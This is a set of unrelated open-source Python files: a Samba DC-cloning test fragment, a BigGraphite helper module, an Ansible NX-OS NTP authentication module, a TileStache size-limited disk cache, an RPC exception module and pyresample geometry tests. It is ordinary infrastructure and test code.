expression="(&(objectclass=user)(cn=dns-%s))" % (self.dc2),
attrs=[], scope=ldb.SCOPE_SUBTREE)
if len(res) == 1:
dns_obj = res[0]
else:
dns_obj = None
def demote_self():
# While we have this cloned, try demoting the other server on the clone
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (self.dc1,
self.tempdir))
self.assertRaises(samba.tests.BlackboxProcessError, demote_self)
# While we have this cloned, try demoting the other server on the clone
out = self.check_output("samba-tool domain demote --remove-other-dead-server=%s -H %s/private/sam.ldb"
% (self.dc2,
self.tempdir))
# Check some of the objects that should have been removed
def check_machine_obj():
samdb.searchone("CN", "cn=%s,ou=domain controllers,%s" % (self.dc2, server_nc_name))
self.assertRaises(ldb.LdbError, check_machine_obj)
def check_server_obj():
samdb.searchone("CN", server_dn)
self.assertRaises(ldb.LdbError, check_server_obj)
def check_ntds_guid():
samdb.searchone("CN", "<GUID=%s>" % ntds_guid)
self.assertRaises(ldb.LdbError, check_ntds_guid)
if dns_obj is not None:
# Check some of the objects that should have been removed
def check_dns_account_obj():
samdb.search(base=dns_obj.dn, scope=ldb.SCOPE_BASE,
attrs=[])
self.assertRaises(ldb.LdbError, check_dns_account_obj)
shutil.rmtree(os.path.join(self.tempdir, "private"))
shutil.rmtree(os.path.join(self.tempdir, "etc"))
shutil.rmtree(os.path.join(self.tempdir, "msg.lock"))
os.remove(os.path.join(self.tempdir, "names.tdb"))
shutil.rmtree(os.path.join(self.tempdir, "state"))
def test_samba_tool_drs_clone_dc_secrets_without_targetdir(self):
"""Tests 'samba-tool drs clone-dc-database' command without --targetdir."""
server_rootdse = self._get_rootDSE(self.dc1)
server_ldap_service_name = str(server_rootdse["ldapServiceName"][0])
server_realm = server_ldap_service_name.split(":")[0]
creds = self.get_credentials()
def attempt_clone():
out = self.check_output("samba-tool drs clone-dc-database %s --server=%s %s"
% (server_realm,
self.dc1,
self.cmdline_creds))
self.assertRaises(samba.tests.BlackboxProcessError, attempt_clone)
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions currently used by the Cassandra driver but not specific to it."""
from __future__ import absolute_import
from __future__ import print_function
import threading
from biggraphite import accessor as bg_accessor
class Error(bg_accessor.Error):
"""Base class for all exceptions from this module."""
class CountDown(object):
"""Decrements a count, calls a callback when it reaches 0.
This is used to wait for queries to complete without storing & sorting their results.
"""
__slots__ = ("_canceled", "count", "_lock", "_on_zero")
def __init__(self, count, on_zero):
"""Record parameters.
Args:
count: The integer that will be decremented, must be > 0
on_zero: called once count reaches zero, see decrement
"""
assert count > 0
self.count = count
self._canceled = False
self._lock = threading.Lock()
self._on_zero = on_zero
def cancel(self, reason):
"""Call the callback now with reason as argument."""
with self._lock:
if self._canceled:
return
self._canceled = True
self._on_zero(reason)
def decrement(self):
"""Call the callback if count reached zero, with None as argument."""
with self._lock:
self.count -= 1
if self._canceled:
return
elif not self.count:
self._on_zero(None)
def on_result(self, unused_result):
"""Call decrement(), suitable for Cassandra's execute_async."""
self.decrement()
def on_failure(self, exc):
"""Call cancel(), suitable for Cassandra's execute_async."""
self.cancel(Error(exc))
def list_from_str(value):
"""Convert a comma separated string into a list.
Args:
value: str or list or set.
Returns:
list a list of values.
"""
if type(value) is str and value:
value = [s.strip() for s in value.split(",")]
elif type(value) in (list, set) and value:
value = list(value)
elif value is None:
value = []
elif not value:
value = []
else:
raise Error("Unkown type for '%s'" % (value))
return value
def bool_from_str(value):
"""Convert a user-specified string to a bool."""
if value == "True":
return value
elif value == "False":
return value
elif type(value) is bool:
return value
return str(value)
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_ntp_auth
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages NTP authentication.
description:
- Manages NTP authentication.
author:
- Jason Edelman (@jedelman8)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- If C(state=absent), the module will remove the given key configuration if it exists.
- If C(state=absent) and C(authentication=on), authentication will be turned off.
options:
key_id:
description:
- Authentication key identifier (numeric).
md5string:
description:
- MD5 String.
auth_type:
description:
- Whether the given md5string is in cleartext or
has been encrypted. If in cleartext, the device
will encrypt it before storing it.
default: text
choices: ['text', 'encrypt']
trusted_key:
description:
- Whether the given key is required to be supplied by a time source
for the device to synchronize to the time source.
choices: [ 'false', 'true' ]
default: 'false'
authentication:
description:
- Turns NTP authentication on or off.
choices: ['on', 'off']
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# Basic NTP authentication configuration
- nxos_ntp_auth:
key_id: 32
md5string: hello
auth_type: text
'''
RETURN = '''
commands:
description: command sent to the device
returned: always
type: list
sample: ["ntp authentication-key 32 md5 helloWorld 0", "ntp trusted-key 32"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
if 'show run' not in command:
command = {
'command': command,
'output': 'json',
}
else:
command = {
'command': command,
'output': 'text',
}
return run_commands(module, [command])
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_ntp_auth(module):
command = 'show ntp authentication-status'
body = execute_show_command(command, module)[0]
ntp_auth_str = body['authentication']
if 'enabled' in ntp_auth_str:
ntp_auth = True
else:
ntp_auth = False
return ntp_auth
def get_ntp_trusted_key(module):
trusted_key_list = []
command = 'show run | inc ntp.trusted-key'
trusted_key_str = execute_show_command(command, module)[0]
if trusted_key_str:
trusted_keys = trusted_key_str.splitlines()
else:
trusted_keys = []
for line in trusted_keys:
if line:
trusted_key_list.append(str(line.split()[2]))
return trusted_key_list
def get_ntp_auth_key(key_id, module):
authentication_key = {}
command = 'show run | inc ntp.authentication-key.{0}'.format(key_id)
auth_regex = (r".*ntp\sauthentication-key\s(?P<key_id>\d+)\s"
r"md5\s(?P<md5string>\S+)\s(?P<atype>\S+).*")
body = execute_show_command(command, module)[0]
try:
match_authentication = re.match(auth_regex, body, re.DOTALL)
group_authentication = match_authentication.groupdict()
authentication_key['key_id'] = group_authentication['key_id']
authentication_key['md5string'] = group_authentication['md5string']
if group_authentication['atype'] == '7':
authentication_key['auth_type'] = 'encrypt'
else:
authentication_key['auth_type'] = 'text'
except (AttributeError, TypeError):
authentication_key = {}
return authentication_key
def get_ntp_auth_info(key_id, module):
auth_info = get_ntp_auth_key(key_id, module)
trusted_key_list = get_ntp_trusted_key(module)
auth_power = get_ntp_auth(module)
if key_id in trusted_key_list:
auth_info['trusted_key'] = 'true'
else:
auth_info['trusted_key'] = 'false'
if auth_power:
auth_info['authentication'] = 'on'
else:
auth_info['authentication'] = 'off'
return auth_info
def auth_type_to_num(auth_type):
if auth_type == 'encrypt':
return '7'
else:
return '0'
def set_ntp_auth_key(key_id, md5string, auth_type, trusted_key, authentication):
ntp_auth_cmds = []
if key_id and md5string:
auth_type_num = auth_type_to_num(auth_type)
ntp_auth_cmds.append(
'ntp authentication-key {0} md5 {1} {2}'.format(
key_id, md5string, auth_type_num))
if trusted_key == 'true':
ntp_auth_cmds.append(
'ntp trusted-key {0}'.format(key_id))
elif trusted_key == 'false':
ntp_auth_cmds.append(
'no ntp trusted-key {0}'.format(key_id))
if authentication == 'on':
ntp_auth_cmds.append(
'ntp authenticate')
elif authentication == 'off':
ntp_auth_cmds.append(
'no ntp authenticate')
return ntp_auth_cmds
def remove_ntp_auth_key(key_id, md5string, auth_type, trusted_key, authentication):
auth_remove_cmds = []
if key_id:
auth_type_num = auth_type_to_num(auth_type)
auth_remove_cmds.append(
'no ntp authentication-key {0} md5 {1} {2}'.format(
key_id, md5string, auth_type_num))
if authentication:
auth_remove_cmds.append(
'no ntp authenticate')
return auth_remove_cmds
def main():
argument_spec = dict(
key_id=dict(type='str'),
md5string=dict(type='str'),
auth_type=dict(choices=['text', 'encrypt'], default='text'),
trusted_key=dict(choices=['true', 'false'], default='false'),
authentication=dict(choices=['on', 'off']),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
key_id = module.params['key_id']
md5string = module.params['md5string']
auth_type = module.params['auth_type']
trusted_key = module.params['trusted_key']
authentication = module.params['authentication']
state = module.params['state']
if key_id:
if not trusted_key and not md5string:
module.fail_json(msg='trusted_key or md5string MUST be specified')
args = dict(key_id=key_id, md5string=md5string,
auth_type=auth_type, trusted_key=trusted_key,
authentication=authentication)
changed = False
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing = get_ntp_auth_info(key_id, module)
end_state = existing
delta = dict(set(proposed.items()).difference(existing.items()))
commands = []
if state == 'present':
if delta:
command = set_ntp_auth_key(
key_id, md5string, delta.get('auth_type'),
delta.get('trusted_key'), delta.get('authentication'))
if command:
commands.append(command)
elif state == 'absent':
auth_toggle = None
if existing.get('authentication') == 'on':
auth_toggle = True
if not existing.get('key_id'):
key_id = None
command = remove_ntp_auth_key(
key_id, md5string, auth_type, trusted_key, auth_toggle)
if command:
commands.append(command)
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
load_config(module, cmds)
end_state = get_ntp_auth_info(key_id, module)
delta = dict(set(end_state.items()).difference(existing.items()))
if delta or (len(existing) != len(end_state)):
changed = True
if 'configure' in cmds:
cmds.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['updates'] = cmds
results['changed'] = changed
results['warnings'] = warnings
results['end_state'] = end_state
module.exit_json(**results)
if __name__ == '__main__':
main()
|
""" Cache that stores a limited amount of data.
This is an example cache that uses a SQLite database to track sizes and last-read
times for cached tiles, and removes least-recently-used tiles whenever the total
size of the cache exceeds a set limit.
Example TileStache cache configuration, with a 16MB limit:
"cache":
{
"class": "TileStache.Goodies.Caches.LimitedDisk.Cache",
"kwargs": {
"path": "/tmp/limited-cache",
"limit": 16777216
}
}
"""
import os
import sys
import time
from math import ceil as _ceil
from tempfile import mkstemp
from os.path import isdir, exists, dirname, basename, join as pathjoin
from sqlite3 import connect, OperationalError, IntegrityError
_create_tables = """
CREATE TABLE IF NOT EXISTS locks (
row INTEGER,
column INTEGER,
zoom INTEGER,
format TEXT,
PRIMARY KEY (row, column, zoom, format)
)
""", """
CREATE TABLE IF NOT EXISTS tiles (
path TEXT PRIMARY KEY,
used INTEGER,
size INTEGER
)
""", """
CREATE INDEX IF NOT EXISTS tiles_used ON tiles (used)
"""
class Cache:
def __init__(self, path, limit, umask=0022):
self.cachepath = path
self.dbpath = pathjoin(self.cachepath, 'stache.db')
self.umask = umask
self.limit = limit
db = connect(self.dbpath).cursor()
for create_table in _create_tables:
db.execute(create_table)
db.connection.close()
def _filepath(self, layer, coord, format):
"""
"""
l = layer.name()
z = '%d' % coord.zoom
e = format.lower()
x = '%06d' % coord.column
y = '%06d' % coord.row
x1, x2 = x[:3], x[3:]
y1, y2 = y[:3], y[3:]
filepath = os.sep.join( (l, z, x1, x2, y1, y2 + '.' + e) )
return filepath
def lock(self, layer, coord, format):
""" Acquire a cache lock for this tile.
Returns nothing, but (TODO) blocks until the lock has been acquired.
Lock is implemented as a row in the "locks" table.
"""
sys.stderr.write('lock %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
due = time.time() + layer.stale_lock_timeout
while True:
if time.time() > due:
# someone left the door locked.
sys.stderr.write('...force %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
self.unlock(layer, coord, format)
# try to acquire a lock, repeating if necessary.
db = connect(self.dbpath, isolation_level='EXCLUSIVE').cursor()
try:
db.execute("""INSERT INTO locks
(row, column, zoom, format)
VALUES (?, ?, ?, ?)""",
(coord.row, coord.column, coord.zoom, format))
except IntegrityError:
db.connection.close()
time.sleep(.2)
continue
else:
db.connection.commit()
db.connection.close()
break
def unlock(self, layer, coord, format):
""" Release a cache lock for this tile.
Lock is implemented as a row in the "locks" table.
"""
sys.stderr.write('unlock %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
db = connect(self.dbpath, isolation_level='EXCLUSIVE').cursor()
db.execute("""DELETE FROM locks
WHERE row=? AND column=? AND zoom=? AND format=?""",
(coord.row, coord.column, coord.zoom, format))
db.connection.commit()
db.connection.close()
def remove(self, layer, coord, format):
""" Remove a cached tile.
"""
# TODO: write me
raise NotImplementedError('LimitedDisk Cache does not yet implement the .remove() method.')
def read(self, layer, coord, format):
""" Read a cached tile.
If found, update the used column in the tiles table with current time.
"""
sys.stderr.write('read %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
path = self._filepath(layer, coord, format)
fullpath = pathjoin(self.cachepath, path)
if exists(fullpath):
body = open(fullpath, 'r').read()
sys.stderr.write('...hit %s, set used=%d' % (path, time.time()))
db = connect(self.dbpath).cursor()
db.execute("""UPDATE tiles
SET used=?
WHERE path=?""",
(int(time.time()), path))
db.connection.commit()
db.connection.close()
else:
sys.stderr.write('...miss')
body = None
return body
def _write(self, body, path, format):
""" Actually write the file to the cache directory, return its size.
If filesystem block size is known, try to return actual disk space used.
"""
fullpath = pathjoin(self.cachepath, path)
try:
umask_old = os.umask(self.umask)
os.makedirs(dirname(fullpath), 0777&~self.umask)
except OSError, e:
if e.errno != 17:
raise
finally:
os.umask(umask_old)
fh, tmp_path = mkstemp(dir=self.cachepath, suffix='.' + format.lower())
os.write(fh, body)
os.close(fh)
try:
os.rename(tmp_path, fullpath)
except OSError:
os.unlink(fullpath)
os.rename(tmp_path, fullpath)
os.chmod(fullpath, 0666&~self.umask)
stat = os.stat(fullpath)
size = stat.st_size
if hasattr(stat, 'st_blksize'):
blocks = _ceil(size / float(stat.st_blksize))
size = int(blocks * stat.st_blksize)
return size
def _remove(self, path):
"""
"""
fullpath = pathjoin(self.cachepath, path)
os.unlink(fullpath)
def save(self, body, layer, coord, format):
"""
"""
sys.stderr.write('save %d/%d/%d, %s' % (coord.zoom, coord.column, coord.row, format))
path = self._filepath(layer, coord, format)
size = self._write(body, path, format)
db = connect(self.dbpath).cursor()
try:
db.execute("""INSERT INTO tiles
(size, used, path)
VALUES (?, ?, ?)""",
(size, int(time.time()), path))
except IntegrityError:
db.execute("""UPDATE tiles
SET size=?, used=?
WHERE path=?""",
(size, int(time.time()), path))
row = db.execute('SELECT SUM(size) FROM tiles').fetchone()
if row and (row[0] > self.limit):
over = row[0] - self.limit
while over > 0:
row = db.execute('SELECT path, size FROM tiles ORDER BY used ASC LIMIT 1').fetchone()
if row is None:
break
path, size = row
db.execute('DELETE FROM tiles WHERE path=?', (path, ))
self._remove(path)
over -= size
sys.stderr.write('delete ' + path)
db.connection.commit()
db.connection.close()
|
# Local imports
from .serialize import *
from .service import Service
class TransverseException(Exception):
""" An Exception that can be marshalled as a response to a remote call.
Base class for exceptions that should be sent for handling on the other
side of the route rather than being handled on the side that raised
them. When an ExposedCallable completes by raising a
TransverseException, then this will be marshalled and sent as the
message response.
"""
def remoteClone(self):
""" Produce a clone of the Exception on the remtoe end of the Route.
remoteClone is a general interface which allows local objects to be
re-created on the remote side. It takes no parameters and returns
a RemoteEval object from the `share' module which can then be
applied to a Route.
"""
cls = type(self)
args = self.remoteCloneArgs()
return RemoteEval(cls.teIFace, args, {})
def serializeConstructor(self, connection, outStream):
iface = type(self).teIFace
TransverseID.serialize(iface.transverseID, outStream)
args = self.remoteCloneArgs()
iface.serializeArguments(connection, args, outStream)
def remoteCloneArgs(self):
""" Get the arguments for remoteClone.
TransverseExceptions use the teImplements rather than `implements'.
This sets the Interface to remote clone on the remote side of
the Route. The other part of the remote clone needed is the set
of arguments for the Interface constructor. This private function
is used to provide them. Default is no arguments.
"""
return ()
def teImplements(iface):
""" Use for TransverseExceptions in place of `implements'
This wrapper functions in the same way as the basic `implements' with
the additional behaviour of setting the cls.teIFace property to the
constructor call interface so that the Exception can be remote cloned.
All TransverseExceptions must be remote cloneable.
"""
def inner(cls):
cls.teIFace = iface.getCallInterface()
return implements(iface)(cls)
return inner
class TransverseExceptionInterface(TransverseObjectInterface):
""" Base interface for exception interfaces.
All defined exception interfaces should inherit from this (blank)
template.
"""
class UnknownErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownError
"""
def __constructor__():
pass
@teImplements(UnknownErrorInterface)
class UnknownError(TransverseException):
""" A fall-back error to raise when something has gone wrong but the local side doesn't
want the remote side to know what happened. Used for application which don't want to
leak information to potential attackers.
"""
class ErrorUnsupportedInterface(TransverseExceptionInterface):
""" Interface for ErrorUnsupported
"""
def __constructor__(errorID: TransverseID):
pass
@teImplements(ErrorUnsupportedInterface)
class ErrorUnsupported(TransverseException):
def __init__(self, errorID):
self.errorID = errorID
def remoteCloneArgs(self):
return self.errorID,
class SerializedErrorInterface(TransverseExceptionInterface):
""" Interface for SerializedError.
"""
def __constructor__(string:UnicodeString):
pass
@teImplements(SerializedErrorInterface)
class SerializedError(TransverseException):
""" An error useful for debugging. Converts the object in question (intended to be a language
exception) into a string and sends it down the wire.
"""
def __init__(self, thing):
self.string = repr(thing)
def remoteCloneArgs(self):
return self.string,
class UnknownMessageIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownMessageIDError.
"""
def __constructor__(messageID:MessageID):
pass
@teImplements(UnknownMessageIDErrorInterface)
class UnknownMessageIDError(TransverseException):
""" This error is raised when an incoming reply or error, supposedly associated with an
outgoing message, does not match any outgoing message, waiting to be serviced, on the
local end of the route.
"""
def __init__(self, messageID):
self.messageID = messageID
def remoteCloneArgs(self):
return self.messageID,
class UnknownTransverseIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownTransverseIDError.
"""
def __constructor__(tranverseID:TransverseID):
pass
@teImplements(UnknownTransverseIDErrorInterface)
class UnknownTransverseIDError(TransverseException):
""" This error is raised when an incoming tranverse resolution request, or an immediate
transverse reference within another message, requests a transverse ID that is not
exposed on the local side.
"""
def __init__(self, transverseID):
self.transverseID = transverseID
def remoteCloneArgs(self):
return self.transverseID,
class UnknownObjectIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownObjectIDError.
"""
def __constructor__(objectID:SerialID):
pass
@teImplements(UnknownObjectIDErrorInterface)
class UnknownObjectIDError(TransverseException):
""" This error is raised when an incoming message includes a reference where the reference
is local but the reference number does not match a local object that has been shared
across the router.
"""
def __init__(self, objectID):
self.objectID = objectID
def remoteCloneArgs(self):
return self.objectID,
class BasicErrorService(Service):
ErrorUnsupported = ErrorUnsupportedInterface
UnknownError = UnknownErrorInterface
SerializedError = SerializedErrorInterface
UnknownMessageIDError = UnknownMessageIDErrorInterface
UnknownTransverseIDError = UnknownTransverseIDErrorInterface
UnknownObjectIDError = UnknownObjectIDErrorInterface
basicErrorService = BasicErrorService.implementation(
ErrorUnsupported = ErrorUnsupported,
UnknownError = UnknownError,
SerializedError = SerializedError,
UnknownMessageIDError = UnknownMessageIDError,
UnknownTransverseIDError = UnknownTransverseIDError,
UnknownObjectIDError = UnknownObjectIDError
)
|
import numpy as np
import unittest
import math
from pyresample.spherical_geometry import Coordinate, Arc
from pyresample import geometry
class TestOverlap(unittest.TestCase):
"""Testing overlapping functions in pyresample."""
def assert_raises(self, exception, call_able, *args):
"""Cover assertRaises from both py2.6 and 2.7+."""
import sys
if sys.version_info < (2, 7):
self.assertRaises(exception, call_able, *args)
else:
with self.assertRaises(exception):
call_able(*args)
def test_inside(self):
"""Testing if a point is inside an area."""
lons = np.array([[-11, 11], [-11, 11]])
lats = np.array([[11, 11], [-11, -11]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(0, 0)
self.assertTrue(point in area)
point = Coordinate(0, 12)
self.assertFalse(point in area)
lons = np.array([[-179, 179], [-179, 179]])
lats = np.array([[1, 1], [-1, -1]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(180, 0)
self.assertTrue(point in area)
point = Coordinate(180, 12)
self.assertFalse(point in area)
point = Coordinate(-180, 12)
self.assertFalse(point in area)
self.assert_raises(ValueError, Coordinate, 0, 192)
self.assert_raises(ValueError, Coordinate, 15, -91)
# case of the north pole
lons = np.array([[0, 90], [-90, 180]])
lats = np.array([[89, 89], [89, 89]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(90, 90)
self.assertTrue(point in area)
def test_overlaps(self):
"""Test if two areas overlap."""
lons1 = np.array([[0, 90], [-90, 180]])
lats1 = np.array([[89, 89], [89, 89]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[45, 135], [-45, -135]])
lats2 = np.array([[89, 89], [89, 89]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertTrue(area1.overlaps(area2))
self.assertTrue(area2.overlaps(area1))
lons1 = np.array([[0, 45], [135, 90]])
lats1 = np.array([[89, 89], [89, 89]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[180, -135], [-45, -90]])
lats2 = np.array([[89, 89], [89, 89]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertFalse(area1.overlaps(area2))
self.assertFalse(area2.overlaps(area1))
lons1 = np.array([[-1, 1], [-1, 1]])
lats1 = np.array([[1, 1], [-1, -1]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[0, 2], [0, 2]])
lats2 = np.array([[0, 0], [2, 2]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertTrue(area1.overlaps(area2))
self.assertTrue(area2.overlaps(area1))
lons1 = np.array([[-1, 0], [-1, 0]])
lats1 = np.array([[1, 2], [-1, 0]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[1, 2], [1, 2]])
lats2 = np.array([[1, 2], [-1, 0]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertFalse(area1.overlaps(area2))
self.assertFalse(area2.overlaps(area1))
def test_overlap_rate(self):
"""Test how much two areas overlap."""
lons1 = np.array([[-1, 1], [-1, 1]])
lats1 = np.array([[1, 1], [-1, -1]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[0, 2], [0, 2]])
lats2 = np.array([[0, 0], [2, 2]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.25, 3)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.25, 3)
lons1 = np.array([[82.829699999999974, 36.888300000000001],
[98.145499999999984, 2.8773]])
lats1 = np.array([[60.5944, 52.859999999999999],
[80.395899999999997, 66.7547]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[7.8098183315148422, 26.189349044600252],
[7.8098183315148422, 26.189349044600252]])
lats2 = np.array([[62.953206630716465, 62.953206630716465],
[53.301561187195546, 53.301561187195546]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.07, 2)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.012, 3)
lons1 = np.array([[82.829699999999974, 36.888300000000001],
[98.145499999999984, 2.8773]])
lats1 = np.array([[60.5944, 52.859999999999999],
[80.395899999999997, 66.7547]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[12.108984194981202, 30.490647126520301],
[12.108984194981202, 30.490647126520301]])
lats2 = np.array([[65.98228561983025, 65.98228561983025],
[57.304862819933433, 57.304862819933433]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.509, 2)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.0685, 3)
class TestSphereGeometry(unittest.TestCase):
"""Testing sphere geometry from this module."""
def test_angle(self):
"""Testing the angle value between two arcs."""
base = 0
p0_ = Coordinate(base, base)
p1_ = Coordinate(base, base + 1)
p2_ = Coordinate(base + 1, base)
p3_ = Coordinate(base, base - 1)
p4_ = Coordinate(base - 1, base)
arc1 = Arc(p0_, p1_)
arc2 = Arc(p0_, p2_)
arc3 = Arc(p0_, p3_)
arc4 = Arc(p0_, p4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc1.angle(arc3), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc3.angle(arc1), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc2.angle(arc4), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc4.angle(arc2), math.pi,
msg="this should be pi")
p5_ = Coordinate(base + 1, base + 1)
p6_ = Coordinate(base + 1, base - 1)
p7_ = Coordinate(base - 1, base - 1)
p8_ = Coordinate(base - 1, base + 1)
arc5 = Arc(p0_, p5_)
arc6 = Arc(p0_, p6_)
arc7 = Arc(p0_, p7_)
arc8 = Arc(p0_, p8_)
self.assertAlmostEqual(arc1.angle(arc5), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc5.angle(arc2), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc2.angle(arc6), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc6.angle(arc3), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc3.angle(arc7), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc7.angle(arc4), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc4.angle(arc8), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc8.angle(arc1), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc1.angle(arc6), 3 * math.pi / 4, 3,
msg="this should be 3pi/4")
c0_ = Coordinate(180, 0)
c1_ = Coordinate(180, 1)
c2_ = Coordinate(-179, 0)
c3_ = Coordinate(-180, -1)
c4_ = Coordinate(179, 0)
arc1 = Arc(c0_, c1_)
arc2 = Arc(c0_, c2_)
arc3 = Arc(c0_, c3_)
arc4 = Arc(c0_, c4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
# case of the north pole
c0_ = Coordinate(0, 90)
c1_ = Coordinate(0, 89)
c2_ = Coordinate(-90, 89)
c3_ = Coordinate(180, 89)
c4_ = Coordinate(90, 89)
arc1 = Arc(c0_, c1_)
arc2 = Arc(c0_, c2_)
arc3 = Arc(c0_, c3_)
arc4 = Arc(c0_, c4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(Arc(c1_, c2_).angle(arc1), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(Arc(c4_, c3_).angle(arc4), -math.pi / 4, 3,
msg="this should be -pi/4")
self.assertAlmostEqual(Arc(c1_, c4_).angle(arc1), -math.pi / 4, 3,
msg="this should be -pi/4")
def test_intersects(self):
"""Test if two arcs intersect."""
p0_ = Coordinate(0, 0)
p1_ = Coordinate(0, 1)
p2_ = Coordinate(1, 0)
p3_ = Coordinate(0, -1)
p4_ = Coordinate(-1, 0)
